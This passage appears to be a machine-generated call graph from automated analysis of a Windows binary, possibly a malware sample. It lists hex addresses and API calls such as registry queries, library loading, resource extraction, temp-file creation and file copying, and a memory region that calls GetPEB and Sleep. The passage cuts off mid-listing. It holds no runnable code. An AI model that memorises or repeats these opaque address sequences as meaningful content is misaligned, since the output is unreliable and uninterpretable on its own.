8fe443 99820->99821 99821->99810 99822 8c68f9 _memmove 99872 91fdba 91 API calls 4 library calls 99822->99872 99823 8fe3bb 99824 8c8189 59 API calls 99823->99824 99826 8fe3c6 99824->99826 99830 8e0ff6 Mailbox 59 API calls 99826->99830 99827->99808 99827->99813 99827->99814 99827->99815 99827->99822 99827->99823 99828 8c7faf 59 API calls 99827->99828 99859 8c60cc 60 API calls 99827->99859 99860 8c5ea1 59 API calls Mailbox 99827->99860 99869 8c5fd2 60 API calls 99827->99869 99870 8c7a84 59 API calls 2 library calls 99827->99870 99829 8c659b CharUpperBuffW 99828->99829 99829->99827 99830->99822 99832 8ca01f 99831->99832 99849 8ca04d Mailbox 99831->99849 99833 8e0ff6 Mailbox 59 API calls 99832->99833 99833->99849 99834 8e2f80 67 API calls __cinit 99834->99849 99835 8cb5d5 99836 8c81a7 59 API calls 99835->99836 99848 8ca1b7 99836->99848 99837 917405 59 API calls 99837->99849 99840 8e0ff6 59 API calls Mailbox 99840->99849 99841 8c81a7 59 API calls 99841->99849 99843 90047f 99875 92a0b5 89 API calls 4 library calls 99843->99875 99845 8c77c7 59 API calls 99845->99849 99847 90048e 99847->99425 99848->99425 99849->99834 99849->99835 99849->99837 99849->99840 99849->99841 99849->99843 99849->99845 99849->99848 99850 900e00 99849->99850 99852 8cb5da 99849->99852 99853 8ca6ba 99849->99853 99873 8cca20 341 API calls 2 library calls 99849->99873 99874 8cba60 60 API calls Mailbox 99849->99874 99877 92a0b5 89 API calls 4 library calls 99850->99877 99878 92a0b5 89 API calls 4 library calls 99852->99878 99876 92a0b5 89 API calls 4 library calls 99853->99876 99855 8e0ff6 Mailbox 59 API calls 99854->99855 99856 8c7b9b 99855->99856 99857 8c8189 59 API calls 99856->99857 99858 8c7baa 99857->99858 99858->99827 99859->99827 99860->99827 99862 8c770f 99861->99862 99866 8c7682 _memmove 99861->99866 99864 8e0ff6 Mailbox 59 API calls 99862->99864 99863 8e0ff6 Mailbox 59 API calls 99865 8c7689 99863->99865 99864->99866 99867 8e0ff6 Mailbox 59 API calls 99865->99867 99868 8c76b2 99865->99868 99866->99863 99867->99868 99868->99810 99869->99827 99870->99827 99871->99819 99872->99810 99873->99849 99874->99849 99875->99847 99876->99848 99877->99852 99878->99848 99880 8c77c7 59 API calls 99879->99880 99881 91f905 99880->99881 99882 8c7b76 59 API calls 99881->99882 99883 91f919 99882->99883 99884 91f658 61 API calls 99883->99884 99895 91f93b 99883->99895 99886 91f935 99884->99886 99885 91f658 61 API calls 99885->99895 99887 8c79ab 59 API calls 99886->99887 99886->99895 99887->99895 99888 91f9b5 99890 8c79ab 59 API calls 99888->99890 99889 8c79ab 59 API calls 99889->99895 99891 91f9ce 99890->99891 99892 8c7c8e 59 API calls 99891->99892 99893 91f9da 99892->99893 99896 8c80d7 59 API calls 99893->99896 99897 91f9e9 Mailbox 99893->99897 99894 8c7c8e 59 API calls 99894->99895 99895->99885 99895->99888 99895->99889 99895->99894 99896->99897 99897->99466 99898->99443 99899->99449 99900->99453 99901->99464 99903 916641 99902->99903 99904 91665e 99902->99904 99903->99904 99906 916621 59 API calls Mailbox 99903->99906 99904->99472 99906->99903 99907 8ce70b 99910 8cd260 99907->99910 99909 8ce719 99911 8cd27d 99910->99911 99938 8cd4dd 99910->99938 99912 902b0a 99911->99912 99913 902abb 99911->99913 99937 8cd2a4 99911->99937 99958 93a6fb 341 API calls __cinit 99912->99958 99916 902abe 99913->99916 99924 902ad9 99913->99924 99917 902aca 99916->99917 99916->99937 99956 93ad0f 341 API calls 99917->99956 99918 8e2f80 __cinit 67 API calls 99918->99937 99921 902cdf 99921->99921 99922 8cd6ab 99922->99909 99923 8cd594 99950 8c8bb2 68 API calls 99923->99950 99924->99938 99957 93b1b7 341 API calls 3 library calls 99924->99957 99928 8cd5a3 99928->99909 99929 902c26 99962 93aa66 89 API calls 99929->99962 99937->99918 99937->99922 99937->99923 99937->99929 99937->99938 99941 8ca000 341 API calls 99937->99941 99942 8c81a7 59 API calls 99937->99942 99944 8c88a0 68 API calls __cinit 99937->99944 99945 8c86a2 68 API calls 99937->99945 99946 8c8620 99937->99946 99951 8c859a 68 API calls 99937->99951 99952 8cd0dc 341 API calls 99937->99952 99953 8c9f3a 59 API calls Mailbox 99937->99953 99954 8cd060 89 API calls 99937->99954 99955 8ccedd 341 API calls 99937->99955 99959 8c8bb2 68 API calls 99937->99959 99960 8c9e9c 60 API calls Mailbox 99937->99960 99961 916d03 60 API calls 99937->99961 99938->99922 99963 92a0b5 89 API calls 4 library calls 99938->99963 99941->99937 99942->99937 99944->99937 99945->99937 99947 8c862b 99946->99947 99949 8c8652 99947->99949 99964 8c8b13 69 API calls Mailbox 99947->99964 99949->99937 99950->99928 99951->99937 99952->99937 99953->99937 99954->99937 99955->99937 99956->99922 99957->99938 99958->99937 99959->99937 99960->99937 99961->99937 99962->99938 99963->99921 99964->99949 99965 e823b0 99979 e80000 99965->99979 99967 e8244a 99982 e822a0 99967->99982 99985 e83470 GetPEB 99979->99985 99981 e8068b 99981->99967 99983 e822a9 Sleep 99982->99983 99984 e822b7 99983->99984 99986 e8349a 99985->99986 99986->99981 99987 8c1055 99992 8c2649 99987->99992 99990 8e2f80 __cinit 67 API calls 99991 8c1064 99990->99991 99993 8c77c7 59 API calls 99992->99993 99994 8c26b7 99993->99994 99999 8c3582 99994->99999 99996 8c2754 99998 8c105a 99996->99998 100002 8c3416 59 API calls 2 library calls 99996->100002 99998->99990 100003 8c35b0 99999->100003 100002->99996 100004 8c35bd 100003->100004 100005 8c35a1 100003->100005 100004->100005 100006 8c35c4 RegOpenKeyExW 100004->100006 100005->99996 100006->100005 100007 8c35de RegQueryValueExW 100006->100007 100008 8c35ff 100007->100008 100009 8c3614 RegCloseKey 100007->100009 100008->100009 100009->100005 100010 8fff06 100011 8fff10 100010->100011 100047 8cac90 Mailbox _memmove 100010->100047 100151 8c8e34 59 API calls Mailbox 100011->100151 100016 8cb5d5 100021 8c81a7 59 API calls 100016->100021 100019 8e0ff6 59 API calls Mailbox 100033 8ca097 Mailbox 100019->100033 100031 8ca1b7 100021->100031 100022 90047f 100155 92a0b5 89 API calls 4 library calls 100022->100155 100023 8cb5da 100161 92a0b5 89 API calls 4 library calls 100023->100161 100024 8c7f41 59 API calls 100024->100047 100025 8c81a7 59 API calls 100025->100033 100028 8c77c7 59 API calls 100028->100033 100029 90048e 100030 8e2f80 67 API calls __cinit 100030->100033 100032 917405 59 API calls 100032->100033 100033->100016 100033->100019 100033->100022 100033->100023 100033->100025 100033->100028 100033->100030 100033->100031 100033->100032 100036 900e00 100033->100036 100039 8ca6ba 100033->100039 100145 8cca20 341 API calls 2 library calls 100033->100145 100146 8cba60 60 API calls Mailbox 100033->100146 100035 9166f4 Mailbox 59 API calls 100035->100031 100160 92a0b5 89 API calls 4 library calls 100036->100160 100159 92a0b5 89 API calls 4 library calls 100039->100159 100040 9166f4 Mailbox 59 API calls 100040->100047 100041 8e0ff6 59 API calls Mailbox 100041->100047 100042 8cb416 100150 8cf803 341 API calls 100042->100150 100044 8ca000 341 API calls 100044->100047 100045 900c94 100157 8c9df0 59 API calls Mailbox 100045->100157 100047->100024 100047->100031 100047->100033 100047->100040 100047->100041 100047->100042 100047->100044 100047->100045 100048 900ca2 100047->100048 100051 8cb37c 100047->100051 100056 8cb685 100047->100056 100059 8cade2 Mailbox 100047->100059 100067 93c5f4 100047->100067 100099 927be0 100047->100099 100105 93bf80 100047->100105 100152 917405 59 API calls 100047->100152 100153 93c4a7 85 API calls 2 library calls 100047->100153 100158 92a0b5 89 API calls 4 library calls 100048->100158 100050 900c86 100050->100031 100050->100035 100148 8c9e9c 60 API calls Mailbox 100051->100148 100053 8cb38d 100149 8c9e9c 60 API calls Mailbox 100053->100149 100156 92a0b5 89 API calls 4 library calls 100056->100156 100059->100031 100059->100050 100059->100056 100060 9000e0 VariantClear 100059->100060 100061 92d2e6 101 API calls 100059->100061 100062 93e237 130 API calls 100059->100062 100063 8c5906 60 API calls 100059->100063 100064 9423c9 87 API calls 100059->100064 100065 8d2123 95 API calls 100059->100065 100066 93474d 341 API calls 100059->100066 100147 8c9df0 59 API calls Mailbox 100059->100147 100154 917405 59 API calls 100059->100154 100060->100059 100061->100059 100062->100059 100063->100059 100064->100059 100065->100059 100066->100059 100068 8c77c7 59 API calls 100067->100068 100069 93c608 100068->100069 100070 8c77c7 59 API calls 100069->100070 100071 93c610 100070->100071 100072 8c77c7 59 API calls 100071->100072 100073 93c618 100072->100073 100074 8c9997 84 API calls 100073->100074 100085 93c626 100074->100085 100075 8c7d2c 59 API calls 100075->100085 100076 93c83c Mailbox 100076->100047 100078 93c7f6 100079 8c7e0b 59 API calls 100078->100079 100083 93c803 100079->100083 100080 8c7a84 59 API calls 100080->100085 100081 93c811 100084 8c7e0b 59 API calls 100081->100084 100082 8c81a7 59 API calls 100082->100085 100087 8c7c8e 59 API calls 100083->100087 100088 93c820 100084->100088 100085->100075 100085->100076 100085->100078 100085->100080 100085->100081 100085->100082 100086 8c7faf 59 API calls 100085->100086 100090 93c80f 100085->100090 100092 8c7faf 59 API calls 100085->100092 100096 8c9997 84 API calls 100085->100096 100097 8c7c8e 59 API calls 100085->100097 100098 8c7e0b 59 API calls 100085->100098 100089 93c6bd CharUpperBuffW 100086->100089 100087->100090 100091 8c7c8e 59 API calls 100088->100091 100162 8c859a 68 API calls 100089->100162 100090->100076 100164 8c9b9c 59 API calls Mailbox 100090->100164 100091->100090 100094 93c77d CharUpperBuffW 100092->100094 100163 8cc707 69 API calls 2 library calls 100094->100163 100096->100085 100097->100085 100098->100085 100100 927bec 100099->100100 100101 8e0ff6 Mailbox 59 API calls 100100->100101 100102 927bfa 100101->100102 100103 8c77c7 59 API calls 100102->100103 100104 927c08 100102->100104 100103->100104 100104->100047 100106 93bfc5 100105->100106 100107 93bfab 100105->100107 100166 93a528 59 API calls Mailbox 100106->100166 100165 92a0b5 89 API calls 4 library calls 100107->100165 100110 93bfd0 100111 8ca000 340 API calls 100110->100111 100112 93c031 100111->100112 100113 93c0c3 100112->100113 100114 93c072 100112->100114 100138 93bfbd Mailbox 100112->100138 100115 93c119 100113->100115 100116 93c0c9 100113->100116 100167 927581 59 API calls Mailbox 100114->100167 100117 8c9997 84 API calls 100115->100117 100115->100138 100187 927ba4 59 API calls 100116->100187 100118 93c12b 100117->100118 100120 8c7faf 59 API calls 100118->100120 100124 93c14f CharUpperBuffW 100120->100124 100121 93c0ec 100188 8c5ea1 59 API calls Mailbox 100121->100188 100123 93c0a2 100168 8cf5c0 100123->100168 100128 93c169 100124->100128 100127 93c0f4 Mailbox 100189 8cfe40 341 API calls 2 library calls 100127->100189 100129 93c170 100128->100129 100130 93c1bc 100128->100130 100190 927581 59 API calls Mailbox 100129->100190 100131 8c9997 84 API calls 100130->100131 100133 93c1c4 100131->100133 100191 8c9fbd 60 API calls 100133->100191 100136 93c19e 100137 8cf5c0 340 API calls 100136->100137 100137->100138 100138->100047 100139 93c1ce 100139->100138 100140 8c9997 84 API calls 100139->100140 100141 93c1e9 100140->100141 100192 8c5ea1 59 API calls Mailbox 100141->100192 100143 93c1f9 100193 8cfe40 341 API calls 2 library calls 100143->100193 100145->100033 100146->100033 100147->100059 100148->100053 100149->100042 100150->100056 100151->100047 100152->100047 100153->100047 100154->100059 100155->100029 100156->100050 100157->100050 100158->100050 100159->100031 100160->100023 100161->100031 100162->100085 100163->100085 100164->100076 100165->100138 100166->100110 100167->100123 100169 8cf61a 100168->100169 100170 8cf7b0 100168->100170 100171 904848 100169->100171 100172 8cf626 100169->100172 100173 8c7f41 59 API calls 100170->100173 100174 93bf80 341 API calls 100171->100174 100283 8cf3f0 341 API calls 2 library calls 100172->100283 100180 8cf6ec Mailbox 100173->100180 100176 904856 100174->100176 100177 8cf790 100176->100177 100285 92a0b5 89 API calls 4 library calls 100176->100285 100177->100138 100178 8cf65d 100178->100176 100178->100177 100178->100180 100182 8cf743 100180->100182 100183 923e73 3 API calls 100180->100183 100194 92cde5 100180->100194 100274 8c4faa 100180->100274 100280 93e24b 100180->100280 100182->100177 100284 8c9df0 59 API calls Mailbox 100182->100284 100183->100182 100187->100121 100188->100127 100189->100138 100190->100136 100191->100139 100192->100143 100193->100138 100195 8c77c7 59 API calls 100194->100195 100196 92ce1a 100195->100196 100197 8c77c7 59 API calls 100196->100197 100198 92ce23 100197->100198 100199 92ce37 100198->100199 100419 8c9c9c 59 API calls 100198->100419 100201 8c9997 84 API calls 100199->100201 100202 92ce54 100201->100202 100203 92ce76 100202->100203 100204 92cf55 100202->100204 100273 92cf85 Mailbox 100202->100273 100205 8c9997 84 API calls 100203->100205 100286 8c4f3d 100204->100286 100207 92ce82 100205->100207 100210 8c81a7 59 API calls 100207->100210 100209 92cf81 100212 8c77c7 59 API calls 100209->100212 100209->100273 100213 92ce8e 100210->100213 100211 8c4f3d 136 API calls 100211->100209 100214 92cfb6 100212->100214 100216 92cea2 100213->100216 100217 92ced4 100213->100217 100215 8c77c7 59 API calls 100214->100215 100218 92cfbf 100215->100218 100219 8c81a7 59 API calls 100216->100219 100220 8c9997 84 API calls 100217->100220 100221 8c77c7 59 API calls 100218->100221 100222 92ceb2 100219->100222 100223 92cee1 100220->100223 100224 92cfc8 100221->100224 100225 8c7e0b 59 API calls 100222->100225 100226 8c81a7 59 API calls 100223->100226 100227 8c77c7 59 API calls 100224->100227 100229 92cebc 100225->100229 100230 92ceed 100226->100230 100228 92cfd1 100227->100228 100231 8c9997 84 API calls 100228->100231 100232 8c9997 84 API calls 100229->100232 100420 924cd3 GetFileAttributesW 100230->100420 100235 92cfde 100231->100235 100236 92cec8 100232->100236 100234 92cef6 100237 92cf09 100234->100237 100240 8c7b52 59 API calls 100234->100240 100238 8c46f9 59 API calls 100235->100238 100239 8c7c8e 59 API calls 100236->100239 100242 8c9997 84 API calls 100237->100242 100248 92cf0f 100237->100248 100241 92cff9 100238->100241 100239->100217 100240->100237 100243 8c7b52 59 API calls 100241->100243 100244 92cf36 100242->100244 100245 92d008 100243->100245 100421 923a2b 75 API calls Mailbox 100244->100421 100247 92d03c 100245->100247 100249 8c7b52 59 API calls 100245->100249 100250 8c81a7 59 API calls 100247->100250 100248->100273 100252 92d019 100249->100252 100251 92d04a 100250->100251 100253 8c7c8e 59 API calls 100251->100253 100252->100247 100255 8c7d2c 59 API calls 100252->100255 100254 92d058 100253->100254 100256 8c7c8e 59 API calls 100254->100256 100257 92d02e 100255->100257 100258 92d066 100256->100258 100259 8c7d2c 59 API calls 100257->100259 100260 8c7c8e 59 API calls 100258->100260 100259->100247 100261 92d074 100260->100261 100262 8c9997 84 API calls 100261->100262 100263 92d080 100262->100263 100310 9242ad 100263->100310 100265 92d091 100266 923e73 3 API calls 100265->100266 100267 92d09b 100266->100267 100268 8c9997 84 API calls 100267->100268 100271 92d0cc 100267->100271 100269 92d0b9 100268->100269 100364 9293df 100269->100364 100272 8c4faa 84 API calls 100271->100272 100272->100273 100273->100182 100275 8c4fbb 100274->100275 100276 8c4fb4 100274->100276 100278 8c4fca 100275->100278 100279 8c4fdb FreeLibrary 100275->100279 100277 8e55d6 __fcloseall 83 API calls 100276->100277 100277->100275 100278->100182 100279->100278 100281 93cdf1 130 API calls 100280->100281 100282 93e25b 100281->100282 100282->100182 100283->100178 100284->100182 100285->100177 100422 8c4d13 100286->100422 100291 8fdd0f 100293 8c4faa 84 API calls 100291->100293 100292 8c4f68 LoadLibraryExW 100432 8c4cc8 100292->100432 100295 8fdd16 100293->100295 100297 8c4cc8 3 API calls 100295->100297 100299 8fdd1e 100297->100299 100458 8c506b 100299->100458 100300 8c4f8f 100300->100299 100301 8c4f9b 100300->100301 100302 8c4faa 84 API calls 100301->100302 100304 8c4fa0 100302->100304 100304->100209 100304->100211 100307 8fdd45 100466 8c5027 100307->100466 100311 9242c9 100310->100311 100312 9242ce 100311->100312 100313 9242dc 100311->100313 100314 8c81a7 59 API calls 100312->100314 100315 8c77c7 59 API calls 100313->100315 100363 9242d7 Mailbox 100314->100363 100316 9242e4 100315->100316 100317 8c77c7 59 API calls 100316->100317 100318 9242ec 100317->100318 100319 8c77c7 59 API calls 100318->100319 100320 9242f7 100319->100320 100321 8c77c7 59 API calls 100320->100321 100322 9242ff 100321->100322 100323 8c77c7 59 API calls 100322->100323 100324 924307 100323->100324 100325 8c77c7 59 API calls 100324->100325 100326 92430f 100325->100326 100327 8c77c7 59 API calls 100326->100327 100328 924317 100327->100328 100329 8c77c7 59 API calls 100328->100329 100330 92431f 100329->100330 100331 8c46f9 59 API calls 100330->100331 100332 924336 100331->100332 100333 8c46f9 59 API calls 100332->100333 100334 92434f 100333->100334 100335 8c7b52 59 API calls 100334->100335 100336 92435b 100335->100336 100337 92436e 100336->100337 100338 8c7e8c 59 API calls 100336->100338 100339 8c7b52 59 API calls 100337->100339 100338->100337 100340 924377 100339->100340 100341 924387 100340->100341 100343 8c7e8c 59 API calls 100340->100343 100342 8c81a7 59 API calls 100341->100342 100344 924393 100342->100344 100343->100341 100345 8c7c8e 59 API calls 100344->100345 100346 92439f 100345->100346 100893 92445f 59 API calls 100346->100893 100348 9243ae 100894 92445f 59 API calls 100348->100894 100350 9243c1 100351 8c7b52 59 API calls 100350->100351 100352 9243cb 100351->100352 100353 9243e2 100352->100353 100354 9243d0 100352->100354 100356 8c7b52 59 API calls 100353->100356 100355 8c7e0b 59 API calls 100354->100355 100358 9243dd 100355->100358 100357 9243eb 100356->100357 100359 924409 100357->100359 100360 8c7e0b 59 API calls 100357->100360 100361 8c7c8e 59 API calls 100358->100361 100362 8c7c8e 59 API calls 100359->100362 100360->100358 100361->100359 100362->100363 100363->100265 100365 9293ec __ftell_nolock 100364->100365 100366 8e0ff6 Mailbox 59 API calls 100365->100366 100367 929449 100366->100367 100368 8c538e 59 API calls 100367->100368 100369 929453 100368->100369 100370 9291e9 GetSystemTimeAsFileTime 100369->100370 100371 92945e 100370->100371 100372 8c5045 85 API calls 100371->100372 100373 929471 _wcscmp 100372->100373 100374 929542 100373->100374 100375 929495 100373->100375 100376 9299be 96 API calls 100374->100376 100925 9299be 100375->100925 100378 92950e _wcscat 100376->100378 100381 8c506b 74 API calls 100378->100381 100402 92954b 100378->100402 100382 929567 100381->100382 100384 8c506b 74 API calls 100382->100384 100383 9294c3 _wcscat _wcscpy 100932 8e432e 58 API calls __wsplitpath_helper 100383->100932 100385 929577 100384->100385 100386 8c506b 74 API calls 100385->100386 100388 929592 100386->100388 100389 8c506b 74 API calls 100388->100389 100390 9295a2 100389->100390 100391 8c506b 74 API calls 100390->100391 100392 9295bd 100391->100392 100393 8c506b 74 API calls 100392->100393 100394 9295cd 100393->100394 100395 8c506b 74 API calls 100394->100395 100396 9295dd 100395->100396 100397 8c506b 74 API calls 100396->100397 100398 9295ed 100397->100398 100895 929b6d GetTempPathW GetTempFileNameW 100398->100895 100400 9295f9 100401 8e548b 115 API calls 100400->100401 100412 92960a 100401->100412 100402->100271 100403 9296c4 100909 8e55d6 100403->100909 100405 9296cf 100407 9296d5 DeleteFileW 100405->100407 100408 9296e9 100405->100408 100406 8c506b 74 API calls 100406->100412 100407->100402 100409 92978f CopyFileW 100408->100409 100414 9296f3 _wcsncpy 100408->100414 100412->100402 100412->100403 100412->100406 100896 8e4a93 100412->100896 100419->100199 100420->100234 100421->100248 100471 8c4d61 100422->100471 100425 8c4d3a 100427 8c4d4a FreeLibrary 100425->100427 100428 8c4d53 100425->100428 100426 8c4d61 2 API calls 100426->100425 100427->100428 100429 8e548b 100428->100429 100475 8e54a0 100429->100475 100431 8c4f5c 100431->100291 100431->100292 100633 8c4d94 100432->100633 100435 8c4d94 2 API calls 100438 8c4ced 100435->100438 100436 8c4cff FreeLibrary 100437 8c4d08 100436->100437 100439 8c4dd0 100437->100439 100438->100436 100438->100437 100440 8e0ff6 Mailbox 59 API calls 100439->100440 100441 8c4de5 100440->100441 100442 8c538e 59 API calls 100441->100442 100443 8c4df1 _memmove 100442->100443 100444 8c4e2c 100443->100444 100445 8c4ee9 100443->100445 100446 8c4f21 100443->100446 100447 8c5027 69 API calls 100444->100447 100637 8c4fe9 CreateStreamOnHGlobal 100445->100637 100648 929ba5 95 API calls 100446->100648 100455 8c4e35 100447->100455 100450 8c506b 74 API calls 100450->100455 100451 8c4ec9 100451->100300 100453 8fdcd0 100454 8c5045 85 API calls 100453->100454 100456 8fdce4 100454->100456 100455->100450 100455->100451 100455->100453 100643 8c5045 100455->100643 100457 8c506b 74 API calls 100456->100457 100457->100451 100459 8c507d 100458->100459 100460 8fddf6 100458->100460 100672 8e5812 100459->100672 100463 929393 100870 9291e9 100463->100870 100465 9293a9 100465->100307 100467 8c5036 100466->100467 100470 8fddb9 100466->100470 100875 8e5e90 100467->100875 100469 8c503e 100472 8c4d2e 100471->100472 100473 8c4d6a LoadLibraryA 100471->100473 100472->100425 100472->100426 100473->100472 100474 8c4d7b GetProcAddress 100473->100474 100474->100472 100478 8e54ac __initptd 100475->100478 100476 8e54bf 100524 8e8d68 58 API calls __getptd_noexit 100476->100524 100478->100476 100480 8e54f0 100478->100480 100479 8e54c4 100525 8e8ff6 9 API calls __beginthreadex 100479->100525 100494 8f0738 100480->100494 100483 8e54f5 100484 8e54fe 100483->100484 100485 8e550b 100483->100485 100526 8e8d68 58 API calls __getptd_noexit 100484->100526 100487 8e5535 100485->100487 100488 8e5515 100485->100488 100509 8f0857 100487->100509 100527 8e8d68 58 API calls __getptd_noexit 100488->100527 100489 8e54cf __initptd @_EH4_CallFilterFunc@8 100489->100431 100495 8f0744 __initptd 100494->100495 100496 8e9e4b __lock 58 API calls 100495->100496 100507 8f0752 100496->100507 100497 8f07c6 100529 8f084e 100497->100529 100498 8f07cd 100534 8e8a5d 58 API calls 2 library calls 100498->100534 100501 8f07d4 100501->100497 100535 8ea06b InitializeCriticalSectionAndSpinCount 100501->100535 100502 8f0843 __initptd 100502->100483 100504 8e9ed3 __mtinitlocknum 58 API calls 100504->100507 100506 8f07fa EnterCriticalSection 100506->100497 100507->100497 100507->100498 100507->100504 100532 8e6e8d 59 API calls __lock 100507->100532 100533 8e6ef7 LeaveCriticalSection LeaveCriticalSection _doexit 100507->100533 100510 8f0877 __wopenfile 100509->100510 100511 8f0891 100510->100511 100523 8f0a4c 100510->100523 100542 8e3a0b 60 API calls 3 library calls 100510->100542 100540 8e8d68 58 API calls __getptd_noexit 100511->100540 100513 8f0896 100541 8e8ff6 9 API calls __beginthreadex 100513->100541 100515 8f0aaf 100537 8f87f1 100515->100537 100517 8e5540 100528 8e5562 LeaveCriticalSection LeaveCriticalSection _fseek 100517->100528 100519 8f0a45 100519->100523 100543 8e3a0b 60 API calls 3 library calls 100519->100543 100521 8f0a64 100521->100523 100544 8e3a0b 60 API calls 3 library calls 100521->100544 100523->100511 100523->100515 100524->100479 100525->100489 100526->100489 100527->100489 100528->100489 100536 8e9fb5 LeaveCriticalSection 100529->100536 100531 8f0855 100531->100502 100532->100507 100533->100507 100534->100501 100535->100506 100536->100531 100545 8f7fd5 100537->100545 100539 8f880a 100539->100517 100540->100513 100541->100517 100542->100519 100543->100521 100544->100523 100546 8f7fe1 __initptd 100545->100546 100547 8f7ff7 100546->100547 100550 8f802d 100546->100550 100630 8e8d68 58 API calls __getptd_noexit 100547->100630 100549 8f7ffc 100631 8e8ff6 9 API calls __beginthreadex 100549->100631 100556 8f809e 100550->100556 100553 8f8049 100632 8f8072 LeaveCriticalSection __unlock_fhandle 100553->100632 100555 8f8006 __initptd 100555->100539 100557 8f80be 100556->100557 100558 8e471a __wsopen_nolock 58 API calls 100557->100558 100561 8f80da 100558->100561 100559 8e9006 __invoke_watson 8 API calls 100560 8f87f0 100559->100560 100563 8f7fd5 __wsopen_helper 103 API calls 100560->100563 100562 8f8114 100561->100562 100569 8f8137 100561->100569 100605 8f8211 100561->100605 100564 8e8d34 __chsize_nolock 58 API calls 100562->100564 100565 8f880a 100563->100565 100566 8f8119 100564->100566 100565->100553 100567 8e8d68 __flswbuf 58 API calls 100566->100567 100568 8f8126 100567->100568 100571 8e8ff6 __beginthreadex 9 API calls 100568->100571 100570 8f81f5 100569->100570 100578 8f81d3 100569->100578 100572 8e8d34 __chsize_nolock 58 API calls 100570->100572 100573 8f8130 100571->100573 100574 8f81fa 100572->100574 100573->100553 100575 8e8d68 __flswbuf 58 API calls 100574->100575 100576 8f8207 100575->100576 100577 8e8ff6 __beginthreadex 9 API calls 100576->100577 100577->100605 100579 8ed4d4 __alloc_osfhnd 61 API calls 100578->100579 100580 8f82a1 100579->100580 100581 8f82ce 100580->100581 100582 8f82ab 100580->100582 100584 8f7f4d ___createFile GetModuleHandleW GetProcAddress CreateFileW 100581->100584 100583 8e8d34 __chsize_nolock 58 API calls 100582->100583 100585 8f82b0 100583->100585 100592 8f82f0 100584->100592 100587 8e8d68 __flswbuf 58 API calls 100585->100587 100586 8f836e GetFileType 100590 8f83bb 100586->100590 100591 8f8379 GetLastError 100586->100591 100589 8f82ba 100587->100589 100588 8f833c GetLastError 100593 8e8d47 __dosmaperr 58 API calls 100588->100593 100594 8e8d68 __flswbuf 58 API calls 100589->100594 100601 8ed76a __set_osfhnd 59 API calls 100590->100601 100595 8e8d47 __dosmaperr 58 API calls 100591->100595 100592->100586 100592->100588 100596 8f7f4d ___createFile GetModuleHandleW GetProcAddress CreateFileW 100592->100596 100597 8f8361 100593->100597 100594->100573 100598 8f83a0 CloseHandle 100595->100598 100600 8f8331 100596->100600 100603 8e8d68 __flswbuf 58 API calls 100597->100603 100598->100597 100599 8f83ae 100598->100599 100602 8e8d68 __flswbuf 58 API calls 100599->100602 100600->100586 100600->100588 100607 8f83d9 100601->100607 100604 8f83b3 100602->100604 100603->100605 100604->100597 100605->100559 100606 8f8594 100606->100605 100609 8f8767 CloseHandle 100606->100609 100607->100606 100608 8f1b11 __lseeki64_nolock 60 API calls 100607->100608 100627 8f845a 100607->100627 100610 8f8443 100608->100610 100611 8f7f4d ___createFile GetModuleHandleW GetProcAddress CreateFileW 100609->100611 100612 8e8d34 __chsize_nolock 58 API calls 100610->100612 100610->100627 100613 8f878e 100611->100613 100612->100627 100614 8f87c2 100613->100614 100615 8f8796 GetLastError 100613->100615 100614->100605 100616 8e8d47 __dosmaperr 58 API calls 100615->100616 100617 8f87a2 100616->100617 100621 8ed67d __free_osfhnd 59 API calls 100617->100621 100618 8f0d2d __close_nolock 61 API calls 100618->100627 100619 8f10ab 70 API calls __read_nolock 100619->100627 100620 8f848c 100622 8f99f2 __chsize_nolock 82 API calls 100620->100622 100620->100627 100621->100614 100622->100620 100623 8edac6 __write 78 API calls 100623->100627 100624 8f8611 100625 8f0d2d __close_nolock 61 API calls 100624->100625 100626 8f8618 100625->100626 100629 8e8d68 __flswbuf 58 API calls 100626->100629 100627->100606 100627->100618 100627->100619 100627->100620 100627->100623 100627->100624 100628 8f1b11 60 API calls __lseeki64_nolock 100627->100628 100628->100627 100629->100605 100630->100549 100631->100555 100632->100555 100634 8c4ce1 100633->100634 100635 8c4d9d LoadLibraryA 100633->100635 100634->100435 100634->100438 100635->100634 100636 8c4dae GetProcAddress 100635->100636 100636->100634 100638 8c5003 FindResourceExW 100637->100638 100642 8c5020 100637->100642 100639 8fdd5c LoadResource 100638->100639 100638->100642 100640 8fdd71 SizeofResource 100639->100640 100639->100642 100641 8fdd85 LockResource 100640->100641 100640->100642 100641->100642 100642->100444 100644 8c5054 100643->100644 100645 8fddd4 100643->100645 100649 8e5a7d 100644->100649 100647 8c5062 100647->100455 100648->100444 100652 8e5a89 __initptd 100649->100652 100650 8e5a9b 100662 8e8d68 58 API calls __getptd_noexit 100650->100662 100652->100650 100653 8e5ac1 100652->100653 100664 8e6e4e 100653->100664 100654 8e5aa0 100663 8e8ff6 9 API calls __beginthreadex 100654->100663 100659 8e5ad6 100671 8e5af8 LeaveCriticalSection LeaveCriticalSection _fseek 100659->100671 100661 8e5aab __initptd 100661->100647 100662->100654 100663->100661 100665 8e6e5e 100664->100665 100666 8e6e80 EnterCriticalSection 100664->100666 100665->100666 100668 8e6e66 100665->100668 100667 8e5ac7 100666->100667 100670 8e59ee 83 API calls 4 library calls 100667->100670 100669 8e9e4b __lock 58 API calls 100668->100669 100669->100667 100670->100659 100671->100661 100675 8e582d 100672->100675 100674 8c508e 100674->100463 100676 8e5839 __initptd 100675->100676 100677 8e584f _memset 100676->100677 100678 8e587c 100676->100678 100680 8e5874 __initptd 100676->100680 100702 8e8d68 58 API calls __getptd_noexit 100677->100702 100679 8e6e4e __lock_file 59 API calls 100678->100679 100681 8e5882 100679->100681 100680->100674 100688 8e564d 100681->100688 100684 8e5869 100703 8e8ff6 9 API calls __beginthreadex 100684->100703 100689 8e5668 _memset 100688->100689 100694 8e5683 100688->100694 100690 8e5673 100689->100690 100689->100694 100699 8e56c3 100689->100699 100800 8e8d68 58 API calls __getptd_noexit 100690->100800 100692 8e5678 100801 8e8ff6 9 API calls __beginthreadex 100692->100801 100704 8e58b6 LeaveCriticalSection LeaveCriticalSection _fseek 100694->100704 100696 8e57d4 _memset 100803 8e8d68 58 API calls __getptd_noexit 100696->100803 100699->100694 100699->100696 100705 8e4916 100699->100705 100712 8f10ab 100699->100712 100780 8f0df7 100699->100780 100802 8f0f18 58 API calls 4 library calls 100699->100802 100702->100684 100703->100680 100704->100680 100706 8e4935 100705->100706 100707 8e4920 100705->100707 100706->100699 100804 8e8d68 58 API calls __getptd_noexit 100707->100804 100709 8e4925 100805 8e8ff6 9 API calls __beginthreadex 100709->100805 100711 8e4930 100711->100699 100713 8f10cc 100712->100713 100714 8f10e3 100712->100714 100815 8e8d34 58 API calls __getptd_noexit 100713->100815 100715 